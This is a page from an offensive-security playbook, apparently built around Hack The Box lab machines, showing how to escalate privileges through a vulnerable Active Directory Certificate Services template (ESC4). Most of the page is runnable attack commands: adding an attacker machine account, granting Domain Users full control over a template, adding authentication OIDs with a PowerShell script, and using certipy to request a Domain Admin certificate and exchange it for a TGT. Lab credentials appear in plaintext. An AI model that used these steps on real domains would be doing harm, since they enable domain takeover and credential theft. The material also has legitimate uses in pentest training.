🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  1. Scenarios

Certificate Authority Vulnerable Cert

The vulnerable cert may say that domain computers can enroll or some other computer access as opposed to user access to enroll. In this case you will need a computer account. You can create a computer account for this purpose.

**Find machine account quota nxc ldap authority -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M MAQ

**Add a computer impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host authority -domain-netbios 'authority.htb' 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'

**Break out key and pem from pfx WinRM SSL can use certificate authentication

  • A pfx file will hold the public and private keys.

  • evil-winrm will requires these to be separated into respective files pub priv files

  • openssl pkcs12 -in file.pfx -info

  • pfx2john

  • Extract priv keys: openssl pkcs12 -in file.pfx -nocerts -out privkey.pem -nodes

  • Extract pub keys: openssl pkcs12 -in file.pfx -nokeys -out pubcert.cert

  • evil-winrm -S -c pubcert.cert -k privkey.pem -i dc01

--

WriteDacl on Cert

https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates ldapsearch -LLL -H ldap://htb.local -b 'cn=configuration,dc=htb,dc=local' -D 'amanda@htb.local' -w 'Ashare1972' -s sub '(objectclass=pkicertificatetemplate)' '*'

Set full controll to all users

Do not do this in a pentest. Give rights to a single principal dsacls "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" /G "HTB\Domain Users:GA"

Add OIDs

# Import Active Directory Module
Import-Module ActiveDirectory

# Define the distinguished name (DN) of the certificate template
$dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"

# Define the application policies to add
$policies = @("1.3.6.1.5.5.7.3.2","1.3.6.1.5.5.7.3.4","1.3.6.1.4.1.311.10.3.4")

# Get the existing application policies (if any)
$currentPolicies = (Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Application-Policy")."msPKI-Certificate-Application-Policy"

# Check if there are any existing policies and merge them with the new ones
if ($currentPolicies -ne $null) {$policies += $currentPolicies | Where-Object { $_ -notin $policies }}

# Update the certificate template with the new application policies
Set-ADObject -Identity $dn -Replace @{ "msPKI-Certificate-Application-Policy" = $policies }

Request the cert

certipy-ad req -u ‘User’ -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn ‘User you want the certificate for [Domain Admin]’ -dc-ip ‘Domain Controller IP’

Use the cert to get a tgt

certipy-ad auth -pfx 'The user we got the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP' certipy-ad auth -pfx sizzler.pfx -dc-ip 10.129.71.105 -dns-tcp -ldap-shell

PreviousCertificate Authority create certificate requestNextCertificate Found
⛓️